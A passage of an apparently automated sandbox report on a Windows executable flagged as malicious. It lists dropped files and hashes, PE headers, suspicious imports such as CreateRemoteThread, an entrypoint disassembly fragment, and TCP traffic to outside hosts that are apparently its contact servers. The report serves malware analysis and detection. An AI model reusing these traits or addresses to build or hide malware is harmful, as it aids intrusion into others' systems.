SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: unknown
Preview: [ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Reputation: unknown
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 15600640
Entropy (8bit): 3.7768495924879493
Encrypted: false
SSDEEP: 6144:xa1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:xag8N+Ae2sTvIM5OYncb
MD5: 310337FA2432C256984AA89486B74D95
SHA1: A5234B3EA059F3A553C55D262BC2B7CB347ED12E
SHA-256: 966557B6F228EDA641E155A858F574654E431743311D83E4841013D63044A994
SHA-512: 8E9F3F6404445BAE167845B77D173AA8FF982DFD7EB998FD33FFD57AC92FB111B4FEAB934A7A961349A00D7D0B925CD3451C814779E33E8FE9454BFED92C6710
Malicious: true
Reputation: unknown

C:\Windows\appcompat\Programs\Amcache.hve
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1572864
Entropy (8bit): 4.2133338797531135
Encrypted: false
SSDEEP: 12288:mxKBe46xNAzd/V0PjNF8ULoAGvE+dAHmdCAsKruqm03eS/SXjZoznH:AKBe46xNAzZV0PsZVrf3
MD5: 14806013B9BD43BA646F753EAFF9B390
SHA1: 1075C9847B578FB5C4AC7E5D353C7CA37D9EB28F
SHA-256: 3DFE3035D3C3273B157B5B4AC66EAD61262F684B5C6ADE9AC0A88B6EE432BBE7
SHA-512: 2696AAB6EBADF79A9999B8E1EA97DCAB7352F7DC4236AD07EC5FF8D9BFBD37F344EFA3B0F2977DDCCD277BE33E83248F83B6290E3C19D831EE751054B3BE0BCC
Malicious: false
Reputation: unknown

C:\Windows\appcompat\Programs\Amcache.hve.LOG1
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 20480
Entropy (8bit): 3.458017950724434
Encrypted: false
SSDEEP: 384:v5gC5BhIpnc8aTVgGpKLXZmnnBpx9787W0:a8nSc8AVgGYLXEnnBJ87W
MD5: 1E22C2B14F4E95B9E20BCC6DC83DA762
SHA1: 14496E143D23B42C0D5C2DE1B9D0F0495607443B
SHA-256: 6D7DCA21B04F335CA0A1C3ABE8C0F14736D1CB2BA0AB22602F395B64E90B3A76
SHA-512: 8106412CC3BA60DD5EA0CE230AB2FE504D74CB7F7AF93B3CF79B312CCFC873DCEB09918806FD98727C76B7FAD813B2331289DC61826FD9A50757D69E3D5ADC89
Malicious: false
Reputation: unknown

\Device\ConDrv
Process: C:\Windows\SysWOW64\netsh.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 3773
Entropy (8bit): 4.7109073551842435
Encrypted: false
SSDEEP: 48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5: DA3247A302D70819F10BCEEBAF400503
SHA1: 2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256: 5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512: 48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious: false
Reputation: unknown
Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.6822544763975475
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: zmbGUZTICp.exe
File size: 319488
MD5: 9af4d2022dc05c2dbbc4d218a8f0974c
SHA1: f87c7511d2c4ea4894603d3cfddd478c8c2b3ead
SHA256: c8fe81088b2caa9df35d92a588fb266a145c95b81b5c66d5bfe181fa73b17d82
SHA512: 71230365c1e7acb2b8740434322a1f8aa87d417eadbb6d8d7fb1b2bf9ecb1247bfec2b2568812f22d61f125b3f4f739989121b5e17c63ccd580d8e8b059c63c0
SSDEEP: 6144:dTIJAM3EC/eddUaHyF9mqcMuS9W1uPVeHcENjQe:dY3EIWU9/pcO9rPVeqe

File Icon

Icon Hash: c8d0d8e0f8e0f4e0

Static PE Info

General

Entrypoint: 0x41b3e0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x602DA0A7 [Wed Feb 17 23:03:03 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 80fec6fca6f81033220e34b44810dbfd

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F75E8BF25EBh
call 00007F75E8BE55F6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov edi, edi
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    push FFFFFFFEh
                                                                                                                                                    push 0043D9D8h
                                                                                                                                                    push 0041E5C0h
                                                                                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                                                                                    push eax
                                                                                                                                                    add esp, FFFFFF94h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov eax, dword ptr [00440354h]
                                                                                                                                                    xor dword ptr [ebp-08h], eax
                                                                                                                                                    xor eax, ebp
                                                                                                                                                    push eax
                                                                                                                                                    lea eax, dword ptr [ebp-10h]
                                                                                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                    mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                    lea eax, dword ptr [ebp-60h]
                                                                                                                                                    push eax
                                                                                                                                                    call dword ptr [004010A0h]
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    jmp 00007F75E8BE5608h
                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                    ret
                                                                                                                                                    mov esp, dword ptr [ebp-18h]
                                                                                                                                                    mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    mov eax, dword ptr [ebp-78h]
                                                                                                                                                    jmp 00007F75E8BE5737h
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    call 00007F75E8BE5774h
                                                                                                                                                    mov dword ptr [ebp-6Ch], eax
                                                                                                                                                    push 00000001h
                                                                                                                                                    call 00007F75E8BF2FCAh
                                                                                                                                                    add esp, 04h
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007F75E8BE55ECh
                                                                                                                                                    push 0000001Ch
                                                                                                                                                    call 00007F75E8BE572Ch
                                                                                                                                                    add esp, 04h
                                                                                                                                                    call 00007F75E8BEE6D4h
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007F75E8BE55ECh
                                                                                                                                                    push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x3e104         | 0x28         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x160000        | 0x83b8       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x169000        | 0x1df4       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x1390          | 0x1c         | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x9130          | 0x40         | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x1000          | 0x344        | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name    | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity  | File Type | Entropy       | Characteristics
.text   | 0x1000          | 0x3e474      | 0x3e600  | False    | 0.581001847445   | data      | 6.95435391538 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data   | 0x40000         | 0x11c988     | 0x1800   | False    | 0.33984375       | data      | 3.45568717424 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.zug    | 0x15d000        | 0x5          | 0x200    | False    | 0.02734375       | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.nafuti | 0x15e000        | 0xea         | 0x200    | False    | 0.02734375       | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.karom  | 0x15f000        | 0xd93        | 0xe00    | False    | 0.00697544642857 | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   | 0x160000        | 0x83b8       | 0x8400   | False    | 0.597064393939   | data      | 5.82148733152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  | 0x169000        | 0x46fa       | 0x4800   | False    | 0.347493489583   | data      | 3.69367482599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name                | RVA      | Size   | Type                                                                              | Language | Country
AFX_DIALOG_LAYOUT   | 0x166ce8 | 0x2    | data                                                                              | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x166ce0 | 0x2    | data                                                                              | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x166cf0 | 0x2    | data                                                                              | Dutch    | Netherlands
AFX_DIALOG_LAYOUT   | 0x166cf8 | 0x2    | data                                                                              | Dutch    | Netherlands
CIDAFICUDUROSOTAROM | 0x1665c8 | 0x6c7  | ASCII text, with very long lines, with no line terminators                        | Spanish  | Colombia
RT_CURSOR           | 0x166d00 | 0x8a8  | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"    | Dutch    | Netherlands
RT_ICON             | 0x1606e0 | 0x6c8  | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x160da8 | 0x568  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Colombia
RT_ICON             | 0x161310 | 0x10a8 | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x1623b8 | 0x988  | dBase III DBT, version number 0, next free block index 40                         | Spanish  | Colombia
RT_ICON             | 0x162d40 | 0x468  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Colombia
RT_ICON             | 0x1631f8 | 0x8a8  | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x163aa0 | 0x6c8  | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x164168 | 0x568  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Colombia
RT_ICON             | 0x1646d0 | 0x10a8 | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x165778 | 0x988  | data                                                                              | Spanish  | Colombia
RT_ICON             | 0x166100 | 0x468  | GLS_BINARY_LSB_FIRST                                                              | Spanish  | Colombia
RT_STRING           | 0x1675c0 | 0xe4   | data                                                                              | Dutch    | Netherlands
RT_STRING           | 0x1676a8 | 0x3a8  | data                                                                              | Dutch    | Netherlands
RT_STRING           | 0x167a50 | 0x6e6  | data                                                                              | Dutch    | Netherlands
RT_STRING           | 0x168138 | 0x1a0  | data                                                                              | Dutch    | Netherlands
RT_STRING           | 0x1682d8 | 0xdc   | data                                                                              | Dutch    | Netherlands
RT_ACCELERATOR      | 0x166ca0 | 0x10   | data                                                                              | Dutch    | Netherlands
RT_ACCELERATOR      | 0x166c90 | 0x10   | data                                                                              | Dutch    | Netherlands
RT_GROUP_CURSOR     | 0x1675a8 | 0x14   | data                                                                              | Dutch    | Netherlands
RT_GROUP_ICON       | 0x1631a8 | 0x4c   | data                                                                              | Spanish  | Colombia
RT_GROUP_ICON       | 0x166568 | 0x5a   | data                                                                              | Spanish  | Colombia
None                | 0x166cc0 | 0xa    | data                                                                              | Dutch    | Netherlands
None                | 0x166cd0 | 0xa    | data                                                                              | Dutch    | Netherlands
None                | 0x166cb0 | 0xa    | data                                                                              | Dutch    | Netherlands

Imports

DLL: KERNEL32.dll
Import: CallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthW, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeW, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, GetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetDriveTypeA, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, GetConsoleMode, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBA, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetNumberOfConsoleInputEvents, GetModuleHandleW, WriteConsoleOutputCharacterA, HeapFree, OpenMutexW, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetProcessVersion, lstrcpynA, GetNamedPipeInfo, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

Possible Origin

Language of compilation system | Country where language is spoken
Dutch                          | Netherlands
Spanish                        | Colombia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Jan 14, 2022 10:43:44.925784111 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:44.943053007 CET | 80          | 49689     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:44.943180084 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:44.943408012 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:44.943439007 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:44.960557938 CET | 80          | 49689     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.063524008 CET | 80          | 49689     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.063720942 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.064712048 CET | 49689       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.081921101 CET | 80          | 49689     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.097636938 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.115295887 CET | 80          | 49690     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.115485907 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.115626097 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.115641117 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.132796049 CET | 80          | 49690     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.236871004 CET | 80          | 49690     | 8.209.70.0  | 192.168.2.6
Jan 14, 2022 10:43:45.237093925 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.237128019 CET | 49690       | 80        | 192.168.2.6 | 8.209.70.0
Jan 14, 2022 10:43:45.254343987 CET | 80          | 49690     | 8.209.70.0  | 192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.590917110 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608295918 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.608402014 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608616114 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608633995 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.625770092 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731518030 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731544971 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731698990 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.732026100 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.749219894 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.032267094 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049676895 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.049788952 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049937963 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049968958 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.067193985 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.172333002 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.172442913 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.172768116 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.190078020 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.205656052 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223099947 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.223211050 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223444939 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223491907 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.240705013 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353874922 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353909969 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353992939 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.354624033 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.371857882 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.677557945 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697048903 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.697189093 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697333097 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697365999 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.716557980 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817501068 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817846060 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817981005 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.818010092 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.828490019 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:46.835369110 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.884790897 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:47.397871971 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:47.454294920 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:47.960551977 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:48.016925097 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.049243927 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066534042 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.066698074 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066840887 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066869020 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.084045887 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.186916113 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.187083006 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.187431097 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.204561949 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.216995001 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234241962 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.234390974 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234538078 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234564066 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.251703978 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.379425049 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.379535913 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.379848957 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.396939039 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.704284906 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.721527100 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.721633911 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.721760988 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.780425072 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823457003 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823493004 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823517084 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823540926 CET80496988.209.70.0192.168.2.6
